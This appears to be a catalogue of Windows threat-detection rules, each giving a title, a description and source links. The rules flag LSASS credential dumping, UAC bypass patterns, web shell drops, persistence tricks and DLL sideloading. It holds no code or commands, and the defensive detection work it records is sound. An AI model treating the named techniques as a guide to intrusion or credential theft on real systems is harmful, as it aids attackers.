Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .aspx files to disk, which could be a sign of ProxyShell exploitation |
https://redcanary.com/blog/blackbyte-ransomware/ |
Suspicious Executable File Creation |
Detect creation of suspicious executable file names.
Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
|
https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae, https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/ |
Suspicious Get-Variable.exe Creation |
Get-Variable is a valid PowerShell cmdlet.
WindowsApps is by default in the PATH where PowerShell is executed.
So when the Get-Variable command is issued on PowerShell execution, the system first looks for a Get-Variable executable in the PATH and executes the malicious binary instead of looking for the PowerShell cmdlet.
|
https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/, https://www.joesandbox.com/analysis/465533/0/html |
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream |
Detects the creation of a hidden file/folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe"
|
https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3 |
Potential Homoglyph Attack Using Lookalike Characters in Filename |
Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that
are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attack characters.
|
https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php |
Legitimate Application Dropped Archive |
Detects programs on a Windows system that should not write an archive to disk |
https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 |
Legitimate Application Dropped Executable |
Detects programs on a Windows system that should not write executables to disk |
https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 |
Legitimate Application Dropped Script |
Detects programs on a Windows system that should not write scripts to disk |
https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326 |
Suspicious LNK Double Extension File Created |
Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
|
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/, https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations, https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles, https://twitter.com/malwrhunterteam/status/1235135745611960321, https://twitter.com/luc4m/status/1073181154126254080 |
Suspicious PFX File Creation |
A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file. |
https://github.com/OTRF/detection-hackathon-apt29/issues/14, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md |
PowerShell Profile Modification |
Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence |
https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/, https://persistence-info.github.io/Data/powershellprofile.html |
Suspicious PROCEXP152.sys File Created In TMP |
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.
This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
|
https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
Suspicious File Creation Activity From Fake Recycle.Bin Folder |
Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware |
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ |
Potential File Extension Spoofing Using Right-to-Left Override |
Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.
|
https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method |
Drop Binaries Into Spool Drivers Color Folder |
Detects the creation of suspicious binary files inside the "\windows\system32\spool\drivers\color\" directory, as seen in the blog referenced below |
https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ |
Suspicious Startup Folder Persistence |
Detects when a file with a suspicious extension is created in the startup folder |
https://github.com/last-byte/PersistenceSniper |
Suspicious Scheduled Task Write to System32 Tasks |
Detects the creation of tasks from processes executed from suspicious locations |
Internal Research |
Suspicious Interactive PowerShell as SYSTEM |
Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm |
TeamViewer Remote Session |
Detects the creation of log files during a TeamViewer remote session |
https://www.teamviewer.com/en-us/ |
VsCode Powershell Profile Modification |
Detects the creation or modification of a VsCode-related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2 |
Windows Terminal Profile Settings Modification By Uncommon Process |
Detects the creation or modification of the Windows Terminal Profile settings file "settings.json" by an uncommon process. |
https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1547.015/T1547.015.md#atomic-test-1---persistence-by-modifying-windows-terminal-profile, https://twitter.com/nas_bench/status/1550836225652686848 |
WinSxS Executable File Creation By Non-System Process |
Detects the creation of binaries in the WinSxS folder by non-system processes |
https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF |
LiveKD Kernel Memory Dump File Created |
Detects the creation of a file that has the same name as the default LiveKD kernel memory dump. |
Internal Research |
LiveKD Driver Creation |
Detects the creation of the LiveKD driver, which is used for live kernel debugging |
Internal Research |
LiveKD Driver Creation By Uncommon Process |
Detects the creation of the LiveKD driver by a process image other than "livekd.exe". |
Internal Research |
Process Explorer Driver Creation By Non-Sysinternals Binary |
Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
Hack tools or malware may use the Process Explorer driver to elevate privileges, dropping it to disk for a few moments, running a service using that driver and removing it afterwards.
|
https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer, https://github.com/Yaxser/Backstab, https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks, https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/ |
Process Monitor Driver Creation By Non-Sysinternals Binary |
Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. |
Internal Research |
PsExec Service File Creation |
Detects the default PsExec service filename, which indicates PsExec service installation and execution |
https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet |
PSEXEC Remote Execution File Artefact |
Detects creation of the PSEXEC key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system |
https://aboutdfir.com/the-key-to-identify-psexec/, https://twitter.com/davisrichardg/status/1616518800584704028 |
Potential Privilege Escalation Attempt Via .Exe.Local Technique |
Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" |
https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt |
LSASS Process Memory Dump Creation Via Taskmgr.EXE |
Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. |
https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1 |
Hijack Legit RDP Session to Move Laterally |
Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder |
Internal Research |
UAC Bypass Using Consent and Comctl32 - File |
Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using .NET Code Profiler on MMC |
Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using EventVwr |
Detects the pattern of a UAC bypass using Windows Event Viewer |
https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw, https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g, https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute |
UAC Bypass Using IDiagnostic Profile - File |
Detects the creation of a file by "dllhost.exe" in the System32 directory as part of the "IDiagnosticProfileUAC" UAC bypass technique |
https://github.com/Wh04m1001/IDiagnosticProfileUAC |
UAC Bypass Using IEInstal - File |
Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using MSConfig Token Modification - File |
Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using NTFS Reparse Point - File |
Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) |
https://github.com/hfiref0x/UACME |
UAC Bypass Abusing Winsat Path Parsing - File |
Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) |
https://github.com/hfiref0x/UACME |
UAC Bypass Using Windows Media Player - File |
Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) |
https://github.com/hfiref0x/UACME |
Creation of WerFault.exe/Wer.dll in Unusual Folder |
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking. |
https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/ |
VHD Image Download Via Browser |
Detects creation of ".vhd"/".vhdx" files by browser processes.
Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
|
https://redcanary.com/blog/intelligence-insights-october-2021/, https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/, https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ |
Visual Studio Code Tunnel Remote File Creation |
Detects the creation of a file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via the VsCode tunnel feature
|
Internal Research |
Renamed VsCode Code Tunnel Execution - File Indicator |
Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility by an "Image" or "Process" other than VsCode.
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html |
Potential Webshell Creation On Static Website |
Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell. |
PT ESC rule and personal experience, https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md |
AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File |
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) |
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 |
Wmiexec Default Output File |
Detects the creation of the default output filename used by the wmiexec tool |
https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/, https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py |
Wmiprvse Wbemcomn DLL Hijack - File |
Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. |
https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html |
WMI Persistence - Script Event Consumer File Write |
Detects file writes by the WMI script event consumer |
https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
UEFI Persistence Via Wpbbin - FileCreation |
Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory, which could be indicative of a UEFI-based persistence method |
https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c, https://persistence-info.github.io/Data/wpbbin.html |
Writing Local Admin Share |
Adversaries may interact with a remote network share using Server Message Block (SMB).
This technique is used by post-exploitation frameworks.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share |
Potentially Suspicious Self Extraction Directive File Created |
Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stands for Self Extraction Directive files.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
Usually ".sed" files are simple ini files and not PE binaries.
|
https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html, https://en.wikipedia.org/wiki/IExpress, https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior |
DLL Loaded From Suspicious Location Via Cmspt.EXE |
Detects cmstp loading "dll" or "ocx" files from suspicious locations |
https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml |
Suspicious Appended Extension |
Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc. |
https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/, https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/ |
Amsi.DLL Loaded Via LOLBIN Process |
Detects loading of "Amsi.dll" by a living-off-the-land process. This could be an indication of a "PowerShell without PowerShell" attack |
Internal Research, https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/ |
Potential Azure Browser SSO Abuse |
Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
An attacker can use this to authenticate to Azure AD in a browser as that user.
|
https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30 |
Suspicious Renamed Comsvcs DLL Loaded By Rundll32 |
Detects rundll32 loading a renamed comsvcs.dll to dump process memory |
https://twitter.com/sbousseaden/status/1555200155351228419 |
CredUI.DLL Loaded By Uncommon Process |
Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". |
https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password, https://learn.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa, https://github.com/S12cybersecurity/RDPCredentialStealer |
Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded |
Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.
Tools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
|
https://learn.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 |
PCRE.NET Package Image Load |
Detects processes loading modules related to PCRE.NET package |
https://twitter.com/rbmaslen/status/1321859647091970051, https://twitter.com/tifkin_/status/1321916444557365248 |
Load Of RstrtMgr.DLL By A Suspicious Process |
Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.
This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
It could also be used for anti-analysis purposes by shutting down specific processes.
|
https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html |
Load Of RstrtMgr.DLL By An Uncommon Process |
Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.
This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.
It could also be used for anti-analysis purposes by shutting down specific processes.
|
https://www.crowdstrike.com/blog/windows-restart-manager-part-1/, https://www.crowdstrike.com/blog/windows-restart-manager-part-2/, https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/, https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html |
Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE |
Detects both the CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting the msdt.exe binary to load the "sdiageng.dll" library |
https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/ |
Time Travel Debugging Utility Usage - Image |
Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. |
https://lolbas-project.github.io/lolbas/Binaries/Tttracer/, https://twitter.com/mattifestation/status/1196390321783025666, https://twitter.com/oulusoyum/status/1191329746069655553 |
PowerShell Core DLL Loaded By Non PowerShell Process |
Detects loading of essential DLLs used by PowerShell by a non-PowerShell process.
Detects behavior similar to meterpreter's "load powershell" extension.
|
https://adsecurity.org/?p=2921, https://github.com/p3nt4/PowerShdll |
Suspicious Volume Shadow Copy Vssapi.dll Load |
Detects the image load of VSS DLL by uncommon executables |
https://github.com/ORCx41/DeleteShadowCopies |
Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load |
Detects the image load of VSS DLL by uncommon executables |
https://github.com/ORCx41/DeleteShadowCopies |
Suspicious Volume Shadow Copy VSS_PS.dll Load |
Detects the image load of vss_ps.dll by uncommon executables |
https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add, https://twitter.com/am0nsec/status/1412232114980982787 |
HackTool - SILENTTRINITY Stager DLL Load |
Detects SILENTTRINITY stager dll loading activity |
https://github.com/byt3bl33d3r/SILENTTRINITY |
HackTool - SharpEvtMute DLL Load |
Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs |
https://github.com/bats3c/EvtMute |
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load |
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
Unsigned Image Loaded Into LSASS Process |
Detects the loading of an unsigned image (DLL, EXE) into the LSASS process |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
CLR DLL Loaded Via Office Applications |
Detects CLR DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
DotNET Assembly DLL Loaded Via Office Application |
Detects any assembly DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Active Directory Parsing DLL Loaded Via Office Application |
Detects DSParse DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
GAC DLL Loaded Via Office Applications |
Detects any GAC DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Microsoft Excel Add-In Loaded From Uncommon Location |
Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location |
https://www.mandiant.com/resources/blog/lnk-between-browsers, https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/ |
Active Directory Kerberos DLL Loaded Via Office Application |
Detects Kerberos DLL being loaded by an Office Product |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
Microsoft VBA For Outlook Addin Loaded Via Outlook |
Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58 |
VBA DLL Loaded Via Office Application |
Detects VB DLLs loaded by an Office application, which could indicate the presence of VBA macros. |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16 |
PowerShell Core DLL Loaded Via Office Application |
Detects PowerShell core DLL being loaded by an Office Product |
Internal Research |
Remote DLL Load Via Rundll32.EXE |
Detects a remote DLL load event via "rundll32.exe". |
https://github.com/gabe-k/themebleed, Internal Research |
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load |
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumers activity. |
https://twitter.com/HunterPlaybook/status/1301207718355759107, https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/, https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html |
Potential 7za.DLL Sideloading |
Detects potential DLL sideloading of "7za.dll" |
https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d |
Abusable DLL Potential Sideloading From Suspicious Location |
Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations |
https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html, https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
Potential Antivirus Software DLL Sideloading |
Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc. |
https://hijacklibs.net/ |
Potential appverifUI.DLL Sideloading |
Detects potential DLL sideloading of "appverifUI.dll" |
https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/ |
Aruba Network Service Potential DLL Sideloading |
Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking |
https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09 |
Potential AVKkid.DLL Sideloading |
Detects potential DLL sideloading of "AVKkid.dll" |
https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
Potential CCleanerDU.DLL Sideloading |
Detects potential DLL sideloading of "CCleanerDU.dll" |
https://lab52.io/blog/2344-2/ |
Potential CCleanerReactivator.DLL Sideloading |
Detects potential DLL sideloading of "CCleanerReactivator.dll" |
https://lab52.io/blog/2344-2/ |
Potential Chrome Frame Helper DLL Sideloading |
Detects potential DLL sideloading of "chrome_frame_helper.dll" |
https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html |
Potential DLL Sideloading Via ClassicExplorer32.dll |
Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software |
https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets, https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/ |
Potential DLL Sideloading Via comctl32.dll |
Detects potential DLL sideloading using comctl32.dll to obtain system privileges |
https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt |
Potential DLL Sideloading Using Coregen.exe |
Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/ |
Potential DLL Sideloading Of DBGCORE.DLL |
Detects DLL sideloading of "dbgcore.dll" |
https://hijacklibs.net/ |
System Control Panel Item Loaded From Uncommon Location |
Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. |
https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/, https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/ |
Potential DLL Sideloading Of DBGHELP.DLL |
Detects potential DLL sideloading of "dbghelp.dll" |
https://hijacklibs.net/ |
Potential DLL Sideloading Of DbgModel.DLL |
Detects potential DLL sideloading of "DbgModel.dll" |
https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html |
Potential EACore.DLL Sideloading |
Detects potential DLL sideloading of "EACore.dll" |
https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/ |
Potential Edputil.DLL Sideloading |
Detects potential DLL sideloading of "edputil.dll" |
https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/ |
Potential System DLL Sideloading From Non System Locations |
Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). |
https://hijacklibs.net/, https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/, https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/, https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md, https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/ |
Potential Goopdate.DLL Sideloading |
Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE |
Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location |
https://labs.withsecure.com/publications/fin7-target-veeam-servers |
Potential Iviewers.DLL Sideloading |
Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) |
https://www.secureworks.com/research/shadowpad-malware-analysis |
Potential DLL Sideloading Via JsSchHlp |
Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor |
https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/, http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp |
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE |
Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe".
Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe".
|
https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html, https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/, https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/, https://twitter.com/Max_Mal_/status/1775222576639291859, https://twitter.com/DTCERT/status/1712785426895839339 |
Potential Libvlc.DLL Sideloading |
Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" |
https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html, https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html |
Potential Mfdetours.DLL Sideloading |
Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. |
Internal Research |
Unsigned Mfdetours.DLL Sideloading |
Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. |
Internal Research |
Potential DLL Sideloading Of MpSvc.DLL |
Detects potential DLL sideloading of "MpSvc.dll". |
https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html |
Potential DLL Sideloading Of MsCorSvc.DLL |
Detects potential DLL sideloading of "mscorsvc.dll". |
https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html |
